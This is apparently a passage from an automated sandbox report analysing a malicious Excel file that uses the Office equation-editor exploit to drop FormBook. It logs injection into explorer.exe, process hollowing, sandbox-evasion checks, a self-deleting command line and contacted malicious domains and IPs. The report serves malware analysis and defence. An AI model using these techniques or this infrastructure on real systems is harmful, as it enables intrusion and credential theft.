          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0009B41B push eax; ret
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0009B412 push eax; ret
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0009B47C push eax; ret
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0009C4F5 push cs; iretd
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_000906D4 push cs; iretd
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0009C9AD push eax; ret
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00094E45 push ebp; iretd
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00094F4F push ss; ret
          Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\nsr4627.tmp\System.dllJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loader2[1].exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

          Boot Survival:

          barindex
          Drops PE files to the user root directoryShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: L2.xlsxStream path 'EncryptedPackage' entropy: 7.99983620552 (max. 8.0)

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000004085F4 second address: 00000000004085FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\control.exeRDTSC instruction interceptor: First address: 00000000000885F4 second address: 00000000000885FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\control.exeRDTSC instruction interceptor: First address: 000000000008898E second address: 0000000000088994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004088C0 rdtsc
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2652Thread sleep time: -300000s >= -30000s
          Source: C:\Windows\SysWOW64\control.exe TID: 964Thread sleep time: -36000s >= -30000s
          Source: C:\Windows\SysWOW64\control.exe TID: 172Thread sleep time: -120000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\control.exeLast function: Thread delayed
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00405E61 FindFirstFileA,FindClose,
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0040548B CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0040263E FindFirstFileA,
          Source: explorer.exe, 00000006.00000000.2158460248.0000000004234000.00000004.00000001.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
          Source: explorer.exe, 00000006.00000000.2151792778.00000000001F5000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000006.00000000.2158486728.0000000004263000.00000004.00000001.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ies
          Source: explorer.exe, 00000006.00000000.2158460248.0000000004234000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
          Source: vbc.exe, 00000004.00000002.2148950526.0000000000584000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
          Source: explorer.exe, 00000006.00000000.2152068739.0000000000231000.00000004.00000020.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}
          Source: C:\Users\Public\vbc.exeProcess information queried: ProcessInformation
          Source: C:\Users\Public\vbc.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\control.exeProcess queried: DebugPort
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004088C0 rdtsc
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00409B30 LdrLoadDll,
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00405E88 GetModuleHandleA,LoadLibraryA,GetProcAddress,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009826F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_020726F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\vbc.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\control.exeProcess token adjusted: Debug

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.meganfantastic.com
          Source: C:\Windows\explorer.exeDomain query: www.adultvideolife.xyz
          Source: C:\Windows\explorer.exeDomain query: www.sciencebasedmasks.com
          Source: C:\Windows\explorer.exeNetwork Connect: 45.195.169.197 80
          Source: C:\Windows\explorer.exeDomain query: www.alberthospice.com
          Source: C:\Windows\explorer.exeNetwork Connect: 154.84.76.49 80
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Users\Public\vbc.exe protection: execute and read and write
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\control.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\control.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\Public\vbc.exeThread register set: target process: 1388
          Source: C:\Windows\SysWOW64\control.exeThread register set: target process: 1388
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\Public\vbc.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\Public\vbc.exeSection unmapped: C:\Windows\SysWOW64\control.exe base address: C20000
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
          Source: explorer.exe, 00000006.00000000.2171619631.00000000006F0000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000006.00000000.2171619631.00000000006F0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000006.00000000.2151792778.00000000001F5000.00000004.00000020.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000006.00000000.2171619631.00000000006F0000.00000002.00000001.sdmpBinary or memory string: !Progman
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00405B88 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000004.00000002.2148551339.0000000000510000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2184605345.0000000000530000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2355390594.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2184564654.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000001.2143287241.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2184493776.0000000000270000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2355480146.0000000000170000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2355508020.00000000001A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 4.2.vbc.exe.510000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.510000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000004.00000002.2148551339.0000000000510000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2184605345.0000000000530000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2355390594.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2184564654.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000001.2143287241.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2184493776.0000000000270000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2355480146.0000000000170000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2355508020.00000000001A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 4.2.vbc.exe.510000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.510000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsNative API1Path InterceptionProcess Injection512Masquerading111OS Credential DumpingSecurity Software Discovery221Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
          Default AccountsShared Modules1Boot or Logon Initialization ScriptsExtra Window Memory Injection1Virtualization/Sandbox Evasion2LSASS MemoryVirtualization/Sandbox Evasion2Remote Desktop ProtocolClipboard Data1Exfiltration Over BluetoothIngress Tool Transfer14Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsExploitation for Client Execution13Logon Script (Windows)Logon Script (Windows)Process Injection512Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Deobfuscate/Decode Files or Information1NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol123SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information31LSA SecretsFile and Directory Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonSoftware Packing11Cached Domain CredentialsSystem Information Discovery14VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsExtra Window Memory Injection1DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 433039 Sample: L2.xlsx Startdate: 11/06/2021 Architecture: WINDOWS Score: 100 43 www.obi4ex.com 2->43 55 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->55 57 Found malware configuration 2->57 59 Malicious sample detected (through community Yara rule) 2->59 61 12 other signatures 2->61 11 EQNEDT32.EXE 12 2->11         started        16 EXCEL.EXE 38 33 2->16         started        signatures3 process4 dnsIp5 51 192.210.173.40, 49165, 80 AS-COLOCROSSINGUS United States 11->51 37 C:\Users\user\AppData\...\loader2[1].exe, PE32 11->37 dropped 39 C:\Users\Public\vbc.exe, PE32 11->39 dropped 83 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 11->83 18 vbc.exe 20 11->18         started        41 C:\Users\user\Desktop\~$L2.xlsx, data 16->41 dropped file6 signatures7 process8 file9 35 C:\Users\user\AppData\Local\...\System.dll, PE32 18->35 dropped 63 Multi AV Scanner detection for dropped file 18->63 65 Detected unpacking (changes PE section rights) 18->65 67 Machine Learning detection for dropped file 18->67 69 2 other signatures 18->69 22 vbc.exe 18->22         started        signatures10 process11 signatures12 71 Modifies the context of a thread in another process (thread injection) 22->71 73 Maps a DLL or memory area into another process 22->73 75 Sample uses process hollowing technique 22->75 77 Queues an APC in another process (thread injection) 22->77 25 explorer.exe 22->25 injected process13 dnsIp14 45 www.meganfantastic.com 45.195.169.197, 49167, 80 POWERLINE-AS-APPOWERLINEDATACENTERHK Seychelles 25->45 47 www.alberthospice.com 154.84.76.49, 49166, 80 DXTL-HKDXTLTseungKwanOServiceHK Seychelles 25->47 49 2 other IPs or domains 25->49 79 System process connects to network (likely due to code injection or exploit) 25->79 81 Performs DNS queries to domains with low reputation 25->81 29 control.exe 9 25->29         started        signatures15 process16 dnsIp17 53 www.adultvideolife.xyz 29->53 85 Performs DNS queries to domains with low reputation 29->85 87 Modifies the context of a thread in another process (thread injection) 29->87 89 Maps a DLL or memory area into another process 29->89 91 Tries to detect virtualization through RDTSC time measurements 29->91 33 cmd.exe 29->33         started        signatures18 process19

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          L2.xlsx30%VirustotalBrowse
          L2.xlsx26%ReversingLabsDocument-OLE.Exploit.CVE-2018-0802

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\Public\vbc.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loader2[1].exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loader2[1].exe23%MetadefenderBrowse
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loader2[1].exe41%ReversingLabsWin32.Backdoor.Mokes
          C:\Users\user\AppData\Local\Temp\nsr4627.tmp\System.dll0%MetadefenderBrowse
          C:\Users\user\AppData\Local\Temp\nsr4627.tmp\System.dll0%ReversingLabs
          C:\Users\Public\vbc.exe23%MetadefenderBrowse
          C:\Users\Public\vbc.exe41%ReversingLabsWin32.Backdoor.Mokes

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          5.2.vbc.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          5.2.vbc.exe.5b7268.1.unpack100%AviraTR/Dropper.GenDownload File
          7.0.control.exe.c20000.0.unpack100%AviraTR/Dropper.GenDownload File
          4.0.vbc.exe.400000.0.unpack100%AviraHEUR/AGEN.1137482Download File
          4.2.vbc.exe.510000.3.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          7.2.control.exe.2557960.4.unpack100%AviraTR/Patched.Ren.GenDownload File
          4.2.vbc.exe.400000.0.unpack100%AviraHEUR/AGEN.1137482Download File
          5.0.vbc.exe.400000.0.unpack100%AviraHEUR/AGEN.1137482Download File
          7.2.control.exe.5f2210.0.unpack100%AviraTR/Patched.Ren.GenDownload File
          5.2.vbc.exe.880000.2.unpack100%AviraTR/Dropper.GenDownload File
          5.1.vbc.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          7.2.control.exe.c20000.1.unpack100%AviraTR/Dropper.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          www.alberthospice.com1%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://%s.com0%URL Reputationsafe
          http://%s.com0%URL Reputationsafe
          http://%s.com0%URL Reputationsafe
          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://cgi.search.biglobe.ne.jp/favicon.ico0%Avira URL Cloudsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://buscar.ozu.es/0%URL Reputationsafe
          http://buscar.ozu.es/0%URL Reputationsafe
          http://buscar.ozu.es/0%URL Reputationsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          http://search.auction.co.kr/0%URL Reputationsafe
          http://search.auction.co.kr/0%URL Reputationsafe
          http://search.auction.co.kr/0%URL Reputationsafe
          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://www.ozu.es/favicon.ico0%URL Reputationsafe
          http://www.ozu.es/favicon.ico0%URL Reputationsafe
          http://www.ozu.es/favicon.ico0%URL Reputationsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://search.yahoo.co.jp0%URL Reputationsafe
          http://search.yahoo.co.jp0%URL Reputationsafe
          http://search.yahoo.co.jp0%URL Reputationsafe
          www.alberthospice.com/sh2m/0%Avira URL Cloudsafe
          http://buscador.terra.es/0%URL Reputationsafe
          http://buscador.terra.es/0%URL Reputationsafe
          http://buscador.terra.es/0%URL Reputationsafe
          http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
          http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
          http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
          http://www.iask.com/0%URL Reputationsafe
          http://www.iask.com/0%URL Reputationsafe
          http://www.iask.com/0%URL Reputationsafe
          http://cgi.search.biglobe.ne.jp/0%Avira URL Cloudsafe
          http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
          http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
          http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
          http://p.zhongsou.com/favicon.ico0%URL Reputationsafe
          http://p.zhongsou.com/favicon.ico0%URL Reputationsafe
          http://p.zhongsou.com/favicon.ico0%URL Reputationsafe
          http://service2.bfast.com/0%URL Reputationsafe
          http://service2.bfast.com/0%URL Reputationsafe
          http://service2.bfast.com/0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.news.com.au/favicon.ico0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.alberthospice.com
          		154.84.76.49
          		truetrueunknown
          www.meganfantastic.com
          		45.195.169.197
          		truetrue
            		unknown
            www.adultvideolife.xyz
            		127.0.0.1
            		truetrue
              		unknown
              www.sciencebasedmasks.com
              		unknown
              		unknowntrue
                		unknown
                www.obi4ex.com
                		unknown
                		unknowntrue
                  		unknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  www.alberthospice.com/sh2m/true
                  • Avira URL Cloud: safe
                  		low

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://search.chol.com/favicon.icoexplorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                    		high
                    http://www.mercadolivre.com.br/explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://www.merlin.com.pl/favicon.icoexplorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://search.ebay.de/explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                      		high
                      http://www.mtv.com/explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                        		high
                        http://www.rambler.ru/explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                          		high
                          http://www.nifty.com/favicon.icoexplorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                            		high
                            http://www.dailymail.co.uk/explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www3.fnac.com/favicon.icoexplorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                              		high
                              http://buscar.ya.com/explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                		high
                                http://search.yahoo.com/favicon.icoexplorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                  		high
                                  http://www.iis.fhg.de/audioPAexplorer.exe, 00000006.00000000.2158689083.0000000004B50000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.sogou.com/favicon.icoexplorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                    		high
                                    http://asp.usatoday.com/explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                      		high
                                      http://fr.search.yahoo.com/explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpfalse
                                        		high
